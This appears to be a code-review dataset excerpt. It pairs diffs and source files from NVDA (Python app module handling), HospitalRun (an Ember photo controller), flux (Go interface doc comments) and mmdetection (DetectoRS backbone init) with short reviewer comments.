right away; the process could die any time. obj.appModule def initialize(): """Initializes the appModule subsystem. """ global NVDAProcessID,_importers NVDAProcessID=os.getpid() config.addConfigDirsToPythonPackagePath(appModules) _importers=list(pkgutil.iter_importers("appModules.__init__")) def terminate(): for processID, app in runningTable.items(): try: app.terminate() except: log.exception("Error terminating app module %r" % app) runningTable.clear() def handleAppSwitch(oldMods, newMods): newModsSet = set(newMods) processed = set() nextStage = [] if not oldMods or oldMods[-1].appName != newMods[-1].appName: post_appSwitch.notify() # Determine all apps that are losing focus and fire appropriate events. for mod in reversed(oldMods): if mod in processed: # This app has already been handled. continue processed.add(mod) if mod in newModsSet: # This app isn't losing focus. continue processed.add(mod) # This app is losing focus. nextStage.append(mod) if not mod.sleepMode and hasattr(mod,'event_appModule_loseFocus'): try: mod.event_appModule_loseFocus() except watchdog.CallCancelled: pass nvdaGuiLostFocus = nextStage and nextStage[-1].appName == "nvda" if not nvdaGuiLostFocus and (not oldMods or oldMods[-1].appName != "nvda") and newMods[-1].appName == "nvda": # NVDA's GUI just got focus. import gui if gui.shouldConfigProfileTriggersBeSuspended(): config.conf.suspendProfileTriggers() with config.conf.atomicProfileSwitch(): # Exit triggers for apps that lost focus. for mod in nextStage: mod._configProfileTrigger.exit() mod._configProfileTrigger = None nextStage = [] # Determine all apps that are gaining focus and enter triggers. for mod in newMods: if mod in processed: # This app isn't gaining focus or it has already been handled. continue processed.add(mod) # This app is gaining focus. 
nextStage.append(mod) trigger = mod._configProfileTrigger = AppProfileTrigger(mod.appName) trigger.enter() if nvdaGuiLostFocus: import gui if not gui.shouldConfigProfileTriggersBeSuspended(): config.conf.resumeProfileTriggers() # Fire appropriate events for apps gaining focus. for mod in nextStage: if not mod.sleepMode and hasattr(mod,'event_appModule_gainFocus'): mod.event_appModule_gainFocus() #base class for appModules class AppModule(baseObject.ScriptableObject): """Base app module. App modules provide specific support for a single application. Each app module should be a Python module or a package in the appModules package named according to the executable it supports; e.g. explorer.py for the explorer.exe application or firefox/__init__.py for firefox.exe. It should containa C{AppModule} class which inherits from this base class. App modules can implement and bind gestures to scripts. These bindings will only take effect while an object in the associated application has focus. See L{ScriptableObject} for details. App modules can also receive NVDAObject events for objects within the associated application. This is done by implementing methods called C{event_eventName}, where C{eventName} is the name of the event; e.g. C{event_gainFocus}. These event methods take two arguments: the NVDAObject on which the event was fired and a callable taking no arguments which calls the next event handler. Some executables host many different applications; e.g. javaw.exe. In this case, it is desirable that a specific app module be loaded for each actual application, rather than the one for the hosting executable. To support this, the module for the hosting executable (not the C{AppModule} class within it) can implement the function C{getAppNameFromHost(processId)}, where C{processId} is the id of the host process. It should return a unicode string specifying the name that should be used. Alternatively, it can raise C{LookupError} if a name couldn't be determined. """ #: Whether NVDA should sleep while in this application (e.g. the application is self-voicing). #: If C{True}, all events and script requests inside this application are silently dropped. #: @type: bool sleepMode=False def __init__(self,processID,appName=None): super(AppModule,self).__init__() #: The ID of the process this appModule is for. #: @type: int self.processID=processID if appName is None: appName=getAppNameFromProcessID(processID) #: The application name. #: @type: str self.appName=appName self.processHandle=winKernel.openProcess(winKernel.SYNCHRONIZE|winKernel.PROCESS_QUERY_INFORMATION,False,processID) self.helperLocalBindingHandle=None self._inprocRegistrationHandle=None def _getExecutableFileInfo(self): # Used for obtaining file name and version for the executable. # This is needed in case immersive app package returns an error, # dealing with a native app, or a converted desktop app. # Create the buffer to get the executable name exeFileName = ctypes.create_unicode_buffer(ctypes.wintypes.MAX_PATH) length = ctypes.wintypes.DWORD(ctypes.wintypes.MAX_PATH) if not ctypes.windll.Kernel32.QueryFullProcessImageNameW( self.processHandle, 0, exeFileName, ctypes.byref(length) ): raise ctypes.WinError() fileName = exeFileName.value fileinfo = getFileVersionInfo(fileName, "ProductName", "ProductVersion") return (fileinfo["ProductName"], fileinfo["ProductVersion"]) def _getImmersivePackageInfo(self): # Used to obtain full package structure for a hosted app. 
# The package structure consists of product name, version, architecture, language, and app ID. # This is useful for confirming whether an app is hosted or not despite an app reporting otherwise. # Some apps such as File Explorer says it is an immersive process but error 15700 is shown. # Others such as Store version of Office are not truly hosted apps but are distributed via Store. length = ctypes.c_uint() ctypes.windll.kernel32.GetPackageFullName(self.processHandle, ctypes.byref(length), None) packageFullName = ctypes.create_unicode_buffer(length.value) if ctypes.windll.kernel32.GetPackageFullName( self.processHandle, ctypes.byref(length), packageFullName ) == 0: return packageFullName.value else: return None def _setProductInfo(self): """Set productName and productVersion attributes. There are at least two ways of obtaining product info for an app: * Package info for hosted apps * File version info for other apps and for some hosted apps """ # Sometimes (I.E. when NVDA starts) handle is 0, so stop if it is the case if not self.processHandle: raise RuntimeError("processHandle is 0") # No need to worry about immersive (hosted) apps and friends until Windows 8. if winVersion.getWinVer() >= winVersion.WIN8: # Some apps such as File Explorer says it is an immersive process but error 15700 is shown. # Therefore resort to file version info behavior because it is not a hosted app. # Others such as Store version of Office are not truly hosted apps, # yet returns an internal version anyway because they are converted desktop apps. # For immersive apps, default implementation is generic - returns Windows version information. # Thus probe package full name and parse the serialized representation of package info structure. packageInfo = self._getImmersivePackageInfo() if packageInfo is not None: # Product name is of the form publisher.name for a hosted app. productInfo = packageInfo.split("_") else: # File Explorer and friends which are really native aps. productInfo = self._getExecutableFileInfo() else: # Not only native apps, but also some converted desktop aps such as Office. productInfo = self._getExecutableFileInfo() self.productName = productInfo[0] self.productVersion = productInfo[1] def _get_productName(self): self._setProductInfo() return self.productName def _get_productVersion(self): self._setProductInfo() return self.productVersion def __repr__(self): return "<%r (appName %r, process ID %s) at address %x>"%(self.appModuleName,self.appName,self.processID,id(self)) def _get_appModuleName(self): return self.__class__.__module__.split('.')[-1] def _get_isAlive(self): return bool(winKernel.waitForSingleObject(self.processHandle,0)) def terminate(self): """Terminate this app module. This is called to perform any clean up when this app module is being destroyed. Subclasses should call the superclass method first. """ winKernel.closeHandle(self.processHandle) if getattr(self, "_helperPreventDisconnect", False): return if self._inprocRegistrationHandle: ctypes.windll.rpcrt4.RpcSsDestroyClientContext(ctypes.byref(self._inprocRegistrationHandle)) if self.helperLocalBindingHandle: ctypes.windll.rpcrt4.RpcBindingFree(ctypes.byref(self.helperLocalBindingHandle)) def chooseNVDAObjectOverlayClasses(self, obj, clsList): """Choose NVDAObject overlay classes for a given NVDAObject. This is called when an NVDAObject is being instantiated after L{NVDAObjects.NVDAObject.findOverlayClasses} has been called on the API-level class. This allows an AppModule to add or remove overlay classes. 
See L{NVDAObjects.NVDAObject.findOverlayClasses} for details about overlay classes. @param obj: The object being created. @type obj: L{NVDAObjects.NVDAObject} @param clsList: The list of classes, which will be modified by this method if appropriate. @type clsList: list of L{NVDAObjects.NVDAObject} """ # optimisation: Make it easy to detect that this hasn't been overridden. chooseNVDAObjectOverlayClasses._isBase = True def _get_appPath(self): """Returns the full path for the executable e.g. 'C:\\Windows\\explorer.exe' for Explorer. @rtype: str """ size = ctypes.wintypes.DWORD(ctypes.wintypes.MAX_PATH) path = ctypes.create_unicode_buffer(size.value) winKernel.kernel32.QueryFullProcessImageNameW(self.processHandle, 0, path, ctypes.byref(size)) self.appPath = path.value if path else None return self.appPath def _get_is64BitProcess(self): """Whether the underlying process is a 64 bit process. @rtype: bool """ if os.environ.get("PROCESSOR_ARCHITEW6432") not in ("AMD64","ARM64"): # This is 32 bit Windows. self.is64BitProcess = False return False try: # We need IsWow64Process2 to detect WOW64 on ARM64. processMachine = ctypes.wintypes.USHORT() if ctypes.windll.kernel32.IsWow64Process2(self.processHandle, ctypes.byref(processMachine), None) == 0: self.is64BitProcess = False return False # IMAGE_FILE_MACHINE_UNKNOWN if not a WOW64 process. self.is64BitProcess = processMachine.value == winKernel.IMAGE_FILE_MACHINE_UNKNOWN except AttributeError: # IsWow64Process2 is only supported on Windows 10 version 1511 and later. # Fall back to IsWow64Process. res = ctypes.wintypes.BOOL() if ctypes.windll.kernel32.IsWow64Process(self.processHandle, ctypes.byref(res)) == 0: self.is64BitProcess = False return False self.is64BitProcess = not res return self.is64BitProcess def _get_isWindowsStoreApp(self): """Whether this process is a Windows Store (immersive) process. An immersive process is a Windows app that runs inside a Windows Runtime (WinRT) container. These include Windows store apps on Windows 8 and 8.1, and Universal Windows Platform (UWP) apps on Windows 10. A special case is a converted desktop app distributed on Microsoft Store. Not all immersive apps are packaged as a true Store app with a package info e.g. File Explorer reports itself as immersive when it is not. @rtype: bool """ if winVersion.getWinVer() < winVersion.WIN8: # Windows Store/UWP apps were introduced in Windows 8. self.isWindowsStoreApp = False return False # Package info is much more accurate than IsImmersiveProcess # because IsImmersive Process returns nonzero for File Explorer # and zero for Store version of Office. if self._getImmersivePackageInfo() is not None: self.isWindowsStoreApp = True return True self.isWindowsStoreApp = False return self.isWindowsStoreApp def _get_appArchitecture(self): """Returns the target architecture for the specified app. This is useful for detecting X86/X64 apps running on ARM64 releases of Windows 10. The following strings are returned: * x86: 32-bit x86 app on 32-bit or 64-bit Windows. * AMD64: x64 app on x64 or ARM64 Windows. * ARM: 32-bit ARM app on ARM64 Windows. * ARM64: 64-bit ARM app on ARM64 Windows. @rtype: str """ # Details: https://docs.microsoft.com/en-us/windows/desktop/SysInfo/image-file-machine-constants # The only value missing is ARM64 (AA64) # because it is only applicable if ARM64 app is running on ARM64 machines. 
archValues2ArchNames = { 0x014c: "x86", # I386-32 0x8664: "AMD64", # X86-64 0x01c0: "ARM" # 32-bit ARM } # IsWow64Process2 can be used on Windows 10 Version 1511 (build 10586) and later. # Just assume this is an x64 (AMD64) app. # if this is a64-bit app running on 7 through 10 Version 1507 (build 10240). try: # If a native app is running (such as x64 app on x64 machines), app architecture value is not set. processMachine = ctypes.wintypes.USHORT() ctypes.windll.kernel32.IsWow64Process2(self.processHandle, ctypes.byref(processMachine), None) if not processMachine.value: self.appArchitecture = os.environ.get("PROCESSOR_ARCHITEW6432") else: # On ARM64, two 32-bit architectures are supported: x86 (via emulation) and ARM (natively). self.appArchitecture = archValues2ArchNames[processMachine.value] except AttributeError: # Windows 10 Version 1507 (build 10240) and earlier. self.appArchitecture = "AMD64" if self.is64BitProcess else "x86" return self.appArchitecture def isGoodUIAWindow(self,hwnd): """ returns C{True} if the UIA implementation of the given window must be used, regardless whether native or not. This function is the counterpart of and takes precedence over L{isBadUIAWindow}. If both functions return C{False}, the decision of whether to use UIA for the window is left to core. Warning: this may be called outside of NVDA's main thread, therefore do not try accessing NVDAObjects and such, rather just check window class names. """ return False def isBadUIAWindow(self,hwnd): """ returns C{True} if the UIA implementation of the given window must be ignored due to it being broken in some way. This function is the counterpart of L{isGoodUIAWindow}. When both functions return C{True}, L{isGoodUIAWindow} takes precedence. If both functions return C{False}, the decision of whether to use UIA for the window is left to core. Warning: this may be called outside of NVDA's main thread, therefore do not try accessing NVDAObjects and such, rather just check window class names. """ return False def shouldProcessUIAPropertyChangedEvent(self, sender, propertyId): """ Determines whether NVDA should process a UIA property changed event. Returning False will cause the event to be dropped completely. This can be used to work around UIA implementations which flood events and cause poor performance. Returning True means that the event will be processed, but it might still be rejected later; e.g. because it isn't native UIA, because shouldAcceptEvent returns False, etc. """ return True def dumpOnCrash(self): """Request that this process writes a minidump when it crashes for debugging. This should only be called if instructed by a developer. """ path = os.path.join(tempfile.gettempdir(), "nvda_crash_%s_%d.dmp" % (self.appName, self.processID)) NVDAHelper.localLib.nvdaInProcUtils_dumpOnCrash( self.helperLocalBindingHandle, path) print("Dump path: %s" % path) def _get_statusBar(self): """Retrieve the status bar object of the application. If C{NotImplementedError} is raised, L{api.getStatusBar} will resort to perform a lookup by position. If C{None} is returned, L{GlobalCommands.script_reportStatusLine} will in turn resort to reading the bottom line of text written to the display. @rtype: NVDAObject """ raise NotImplementedError() def _get_statusBarTextInfo(self): """Retrieve a L{TextInfo} positioned at the status bar of the application. This is used by L{GlobalCommands.script_reportStatusLine} in cases where L{api.getStatusBar} could not locate a proper L{NVDAObject} for the status bar. 
For this method to get called, L{_get_statusBar} must return C{None}. @rtype: TextInfo """ raise NotImplementedError() class AppProfileTrigger(config.ProfileTrigger): """A configuration profile trigger for when a particular application has focus. """ def __init__(self, appName): self.spec = "app:%s" % appName def getWmiProcessInfo(processId): """Retrieve the WMI Win32_Process class instance for a given process. For details about the available properties, see http://msdn.microsoft.com/en-us/library/aa394372%28v=vs.85%29.aspx @param processId: The id of the process in question. @type processId: int @return: The WMI Win32_Process class instance. @raise LookupError: If there was an error retrieving the instance. """ try: wmi = comtypes.client.CoGetObject(r"winmgmts:root\cimv2", dynamic=True) results = wmi.ExecQuery("select * from Win32_Process " "where ProcessId = %d" % processId) for result in results: return result except: raise LookupError("Couldn't get process information using WMI") raise LookupError("No such process")
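A quick usage sketch for the getWmiProcessInfo helper defined just above; the process id shown is a made-up value, and the CommandLine attribute relies on the Win32_Process class exposing that property, while the LookupError handling matches the documented behaviour:

# Hypothetical usage sketch for getWmiProcessInfo (not part of the module above).
from appModuleHandler import getWmiProcessInfo  # assumption: the module above is appModuleHandler

try:
	processInfo = getWmiProcessInfo(1234)  # 1234 is a made-up process id
	print(processInfo.CommandLine)  # Win32_Process properties are reached via attribute access
except LookupError:
	print("No WMI information available for this process")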
1
34,135
Could we have this initialization as part of the initialize method?
nvaccess-nvda
py
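To make the app module conventions described in the AppModule docstring above concrete, here is a minimal sketch of what a module loaded for a hypothetical notepad.exe could look like; the file name and the behaviour are illustrative assumptions, not part of the record above:

# appModules/notepad.py -- minimal app module sketch (hypothetical example).
import appModuleHandler

class AppModule(appModuleHandler.AppModule):
	# While notepad.exe has focus, NVDAObject events inside it reach this class.
	def event_gainFocus(self, obj, nextHandler):
		# Application-specific handling would go here; then let normal processing continue.
		nextHandler()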
@@ -15,7 +15,7 @@ export default AbstractEditController.extend({ showUpdateButton: true, database: inject.service(), - editController: inject.controller('patients/edit'), + editController: null, filesystem: inject.service(), photoFileNotSet: computed('model.photoFile', function() {
1
import AbstractEditController from 'hospitalrun/controllers/abstract-edit-controller'; import Ember from 'ember'; import { translationMacro as t } from 'ember-i18n'; const { computed, get, inject, isEmpty, RSVP, set } = Ember; export default AbstractEditController.extend({ addAction: 'addPhoto', editTitle: t('patients.titles.editPhoto'), fileRequiredMessage: t('patients.messages.photoFileRequired'), modelName: 'photo', newTitle: t('patients.titles.addPhoto'), newModel: false, showFileRequired: false, showUpdateButton: true, database: inject.service(), editController: inject.controller('patients/edit'), filesystem: inject.service(), photoFileNotSet: computed('model.photoFile', function() { let model = get(this, 'model'); let isNew = get(model, 'isNew'); let photoFile = get(model, 'photoFile'); return (isNew && isEmpty(photoFile)); }), title: computed('model.isNew', function() { let isNew = get(this, 'model.isNew'); if (isNew) { return get(this, 'newTitle'); } else { return get(this, 'editTitle'); } }), updateButtonAction: computed('photoFileNotSet', function() { let photoFileNotSet = get(this, 'photoFileNotSet'); if (photoFileNotSet) { return 'showFileRequired'; } else { set(this, 'showFileRequired', false); return 'update'; } }), updateButtonClass: computed('photoFileNotSet', function() { let photoFileNotSet = get(this, 'photoFileNotSet'); if (photoFileNotSet) { return 'disabled-btn'; } }), afterUpdate(model) { let isNew = get(this, 'newModel'); let editController = get(this, 'editController'); if (isNew) { let photoFile = get(model, 'photoFile'); let saveToDir = get(model, 'saveToDir'); let fileSystem = get(this, 'filesystem'); let modelName = get(this, 'modelName'); let pouchDbId = get(this, 'database').getPouchId(get(model, 'id'), modelName); fileSystem.addFile(photoFile, saveToDir, pouchDbId).then((fileEntry) => { model.setProperties({ localFile: true, fileName: fileEntry.fullPath, url: fileEntry.toURL() }); model.save().then(() => { editController.send(get(this, 'addAction'), model); }).catch((err) => { throw err; }); }); } else { this.send('closeModal'); } }, beforeUpdate() { let model = get(this, 'model'); let photoFile = get(model, 'photoFile'); let isImage = get(model, 'isImage'); let isNew = get(model, 'isNew'); set(this, 'newModel', isNew); if (isNew) { model.setProperties({ files: [Ember.Object.create({ content_type: photoFile.type, data: photoFile, name: 'file' })], isImage }); } return RSVP.resolve(); }, actions: { cancel() { this.send('closeModal'); }, showFileRequired() { set(this, 'showFileRequired', true); } } });
1
13,725
This line should be removed, as editController is no longer used in this context.
HospitalRun-hospitalrun-frontend
js
@@ -9,11 +9,17 @@ import (
 	"github.com/influxdata/flux/plan"
 )
 
+// Transformation represents functions that control how the execution
+// engine will take in a flux Table, perform the necessary data processing
+// and return an output flux Table
 type Transformation interface {
 	RetractTable(id DatasetID, key flux.GroupKey) error
+	// Process takes in a flux Table, performs data processing on it
+	// and produces an output flux Table
 	Process(id DatasetID, tbl flux.Table) error
 	UpdateWatermark(id DatasetID, t Time) error
 	UpdateProcessingTime(id DatasetID, t Time) error
+	// Finish indicates that the Transformation is complete
 	Finish(id DatasetID, err error)
 }
1
package execute import ( "context" "fmt" "github.com/influxdata/flux" "github.com/influxdata/flux/memory" "github.com/influxdata/flux/plan" ) type Transformation interface { RetractTable(id DatasetID, key flux.GroupKey) error Process(id DatasetID, tbl flux.Table) error UpdateWatermark(id DatasetID, t Time) error UpdateProcessingTime(id DatasetID, t Time) error Finish(id DatasetID, err error) } // StreamContext represents necessary context for a single stream of // query data. type StreamContext interface { Bounds() *Bounds } type Administration interface { Context() context.Context ResolveTime(qt flux.Time) Time StreamContext() StreamContext Allocator() *memory.Allocator Parents() []DatasetID Dependencies() Dependencies } // Dependencies represents the provided dependencies to the execution environment. // The dependencies is opaque. type Dependencies map[string]interface{} type CreateTransformation func(id DatasetID, mode AccumulationMode, spec plan.ProcedureSpec, a Administration) (Transformation, Dataset, error) type CreateNewPlannerTransformation func(id DatasetID, mode AccumulationMode, spec plan.ProcedureSpec, a Administration) (Transformation, Dataset, error) var procedureToTransformation = make(map[plan.ProcedureKind]CreateNewPlannerTransformation) // RegisterTransformation adds a new registration mapping of procedure kind to transformation. func RegisterTransformation(k plan.ProcedureKind, c CreateNewPlannerTransformation) { if procedureToTransformation[k] != nil { panic(fmt.Errorf("duplicate registration for transformation with procedure kind %v", k)) } procedureToTransformation[k] = c } // ReplaceTransformation changes an existing transformation registration. func ReplaceTransformation(k plan.ProcedureKind, c CreateNewPlannerTransformation) { if procedureToTransformation[k] == nil { panic(fmt.Errorf("missing registration for transformation with procedure kind %v", k)) } procedureToTransformation[k] = c }
1
11,750
This is correct in concept, but the method signature doesn't really communicate that. In other words, if the function produces an output table, where is it? It's not in the function signature. Can you explain where the output table is created?
influxdata-flux
go
@@ -238,9 +238,14 @@ class DetectoRS_ResNet(ResNet): pretrained=None, init_cfg=None, **kwargs): - assert init_cfg is None, 'To prevent abnormal initialization ' \ - 'behavior, init_cfg is not allowed to be set' - self.pretrained = pretrained + self.init_cfg = init_cfg + if init_cfg is not None: # init_cfg priority > pretrained + self.pretrained = init_cfg['checkpoint'] + else: + if pretrained is not None: + self.pretrained = pretrained + else: + self.pretrained = None self.sac = sac self.stage_with_sac = stage_with_sac self.rfp_inplanes = rfp_inplanes
1
import torch.nn as nn import torch.utils.checkpoint as cp from mmcv.cnn import (build_conv_layer, build_norm_layer, constant_init, kaiming_init) from mmcv.runner import Sequential, load_checkpoint from torch.nn.modules.batchnorm import _BatchNorm from mmdet.utils import get_root_logger from ..builder import BACKBONES from .resnet import BasicBlock from .resnet import Bottleneck as _Bottleneck from .resnet import ResNet class Bottleneck(_Bottleneck): r"""Bottleneck for the ResNet backbone in `DetectoRS <https://arxiv.org/pdf/2006.02334.pdf>`_. This bottleneck allows the users to specify whether to use SAC (Switchable Atrous Convolution) and RFP (Recursive Feature Pyramid). Args: inplanes (int): The number of input channels. planes (int): The number of output channels before expansion. rfp_inplanes (int, optional): The number of channels from RFP. Default: None. If specified, an additional conv layer will be added for ``rfp_feat``. Otherwise, the structure is the same as base class. sac (dict, optional): Dictionary to construct SAC. Default: None. init_cfg (dict or list[dict], optional): Initialization config dict. Default: None """ expansion = 4 def __init__(self, inplanes, planes, rfp_inplanes=None, sac=None, init_cfg=None, **kwargs): super(Bottleneck, self).__init__( inplanes, planes, init_cfg=init_cfg, **kwargs) assert sac is None or isinstance(sac, dict) self.sac = sac self.with_sac = sac is not None if self.with_sac: self.conv2 = build_conv_layer( self.sac, planes, planes, kernel_size=3, stride=self.conv2_stride, padding=self.dilation, dilation=self.dilation, bias=False) self.rfp_inplanes = rfp_inplanes if self.rfp_inplanes: self.rfp_conv = build_conv_layer( None, self.rfp_inplanes, planes * self.expansion, 1, stride=1, bias=True) if init_cfg is None: self.init_cfg = dict( type='Constant', val=0, override=dict(name='rfp_conv')) def rfp_forward(self, x, rfp_feat): """The forward function that also takes the RFP features as input.""" def _inner_forward(x): identity = x out = self.conv1(x) out = self.norm1(out) out = self.relu(out) if self.with_plugins: out = self.forward_plugin(out, self.after_conv1_plugin_names) out = self.conv2(out) out = self.norm2(out) out = self.relu(out) if self.with_plugins: out = self.forward_plugin(out, self.after_conv2_plugin_names) out = self.conv3(out) out = self.norm3(out) if self.with_plugins: out = self.forward_plugin(out, self.after_conv3_plugin_names) if self.downsample is not None: identity = self.downsample(x) out += identity return out if self.with_cp and x.requires_grad: out = cp.checkpoint(_inner_forward, x) else: out = _inner_forward(x) if self.rfp_inplanes: rfp_feat = self.rfp_conv(rfp_feat) out = out + rfp_feat out = self.relu(out) return out class ResLayer(Sequential): """ResLayer to build ResNet style backbone for RPF in detectoRS. The difference between this module and base class is that we pass ``rfp_inplanes`` to the first block. Args: block (nn.Module): block used to build ResLayer. inplanes (int): inplanes of block. planes (int): planes of block. num_blocks (int): number of blocks. stride (int): stride of the first block. Default: 1 avg_down (bool): Use AvgPool instead of stride conv when downsampling in the bottleneck. Default: False conv_cfg (dict): dictionary to construct and config conv layer. Default: None norm_cfg (dict): dictionary to construct and config norm layer. Default: dict(type='BN') downsample_first (bool): Downsample at the first block or last block. False for Hourglass, True for ResNet. 
Default: True rfp_inplanes (int, optional): The number of channels from RFP. Default: None. If specified, an additional conv layer will be added for ``rfp_feat``. Otherwise, the structure is the same as base class. """ def __init__(self, block, inplanes, planes, num_blocks, stride=1, avg_down=False, conv_cfg=None, norm_cfg=dict(type='BN'), downsample_first=True, rfp_inplanes=None, **kwargs): self.block = block assert downsample_first, f'downsample_first={downsample_first} is ' \ 'not supported in DetectoRS' downsample = None if stride != 1 or inplanes != planes * block.expansion: downsample = [] conv_stride = stride if avg_down and stride != 1: conv_stride = 1 downsample.append( nn.AvgPool2d( kernel_size=stride, stride=stride, ceil_mode=True, count_include_pad=False)) downsample.extend([ build_conv_layer( conv_cfg, inplanes, planes * block.expansion, kernel_size=1, stride=conv_stride, bias=False), build_norm_layer(norm_cfg, planes * block.expansion)[1] ]) downsample = nn.Sequential(*downsample) layers = [] layers.append( block( inplanes=inplanes, planes=planes, stride=stride, downsample=downsample, conv_cfg=conv_cfg, norm_cfg=norm_cfg, rfp_inplanes=rfp_inplanes, **kwargs)) inplanes = planes * block.expansion for _ in range(1, num_blocks): layers.append( block( inplanes=inplanes, planes=planes, stride=1, conv_cfg=conv_cfg, norm_cfg=norm_cfg, **kwargs)) super(ResLayer, self).__init__(*layers) @BACKBONES.register_module() class DetectoRS_ResNet(ResNet): """ResNet backbone for DetectoRS. Args: sac (dict, optional): Dictionary to construct SAC (Switchable Atrous Convolution). Default: None. stage_with_sac (list): Which stage to use sac. Default: (False, False, False, False). rfp_inplanes (int, optional): The number of channels from RFP. Default: None. If specified, an additional conv layer will be added for ``rfp_feat``. Otherwise, the structure is the same as base class. output_img (bool): If ``True``, the input image will be inserted into the starting position of output. Default: False. 
""" arch_settings = { 50: (Bottleneck, (3, 4, 6, 3)), 101: (Bottleneck, (3, 4, 23, 3)), 152: (Bottleneck, (3, 8, 36, 3)) } def __init__(self, sac=None, stage_with_sac=(False, False, False, False), rfp_inplanes=None, output_img=False, pretrained=None, init_cfg=None, **kwargs): assert init_cfg is None, 'To prevent abnormal initialization ' \ 'behavior, init_cfg is not allowed to be set' self.pretrained = pretrained self.sac = sac self.stage_with_sac = stage_with_sac self.rfp_inplanes = rfp_inplanes self.output_img = output_img super(DetectoRS_ResNet, self).__init__(**kwargs) self.inplanes = self.stem_channels self.res_layers = [] for i, num_blocks in enumerate(self.stage_blocks): stride = self.strides[i] dilation = self.dilations[i] dcn = self.dcn if self.stage_with_dcn[i] else None sac = self.sac if self.stage_with_sac[i] else None if self.plugins is not None: stage_plugins = self.make_stage_plugins(self.plugins, i) else: stage_plugins = None planes = self.base_channels * 2**i res_layer = self.make_res_layer( block=self.block, inplanes=self.inplanes, planes=planes, num_blocks=num_blocks, stride=stride, dilation=dilation, style=self.style, avg_down=self.avg_down, with_cp=self.with_cp, conv_cfg=self.conv_cfg, norm_cfg=self.norm_cfg, dcn=dcn, sac=sac, rfp_inplanes=rfp_inplanes if i > 0 else None, plugins=stage_plugins) self.inplanes = planes * self.block.expansion layer_name = f'layer{i + 1}' self.add_module(layer_name, res_layer) self.res_layers.append(layer_name) self._freeze_stages() # In order to be properly initialized by RFP def init_weights(self): # Calling this method will cause parameter initialization exception # super(DetectoRS_ResNet, self).init_weights() if isinstance(self.pretrained, str): logger = get_root_logger() load_checkpoint(self, self.pretrained, strict=False, logger=logger) elif self.pretrained is None: for m in self.modules(): if isinstance(m, nn.Conv2d): kaiming_init(m) elif isinstance(m, (_BatchNorm, nn.GroupNorm)): constant_init(m, 1) if self.dcn is not None: for m in self.modules(): if isinstance(m, Bottleneck) and hasattr( m.conv2, 'conv_offset'): constant_init(m.conv2.conv_offset, 0) if self.zero_init_residual: for m in self.modules(): if isinstance(m, Bottleneck): constant_init(m.norm3, 0) elif isinstance(m, BasicBlock): constant_init(m.norm2, 0) else: raise TypeError('pretrained must be a str or None') def make_res_layer(self, **kwargs): """Pack all blocks in a stage into a ``ResLayer`` for DetectoRS.""" return ResLayer(**kwargs) def forward(self, x): """Forward function.""" outs = list(super(DetectoRS_ResNet, self).forward(x)) if self.output_img: outs.insert(0, x) return tuple(outs) def rfp_forward(self, x, rfp_feats): """Forward function for RFP.""" if self.deep_stem: x = self.stem(x) else: x = self.conv1(x) x = self.norm1(x) x = self.relu(x) x = self.maxpool(x) outs = [] for i, layer_name in enumerate(self.res_layers): res_layer = getattr(self, layer_name) rfp_feat = rfp_feats[i] if i > 0 else None for layer in res_layer: x = layer.rfp_forward(x, rfp_feat) if i in self.out_indices: outs.append(x) return tuple(outs)
1
24,070
To be on the safe side, it's best not to take it directly (a defensive sketch follows this record).
open-mmlab-mmdetection
py
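The review comment on this record asks that init_cfg not be taken directly. A small sketch of the more defensive lookup the reviewer appears to have in mind follows; the assumption that init_cfg, when present, is a dict that may carry a 'checkpoint' entry (e.g. dict(type='Pretrained', checkpoint='torchvision://resnet50')) is mine, not part of the record:

# Sketch only: resolve the pretrained checkpoint without indexing init_cfg blindly.
def resolve_pretrained(init_cfg, pretrained=None):
    if isinstance(init_cfg, dict) and 'checkpoint' in init_cfg:
        return init_cfg['checkpoint']  # init_cfg takes priority over pretrained
    return pretrained  # may legitimately be None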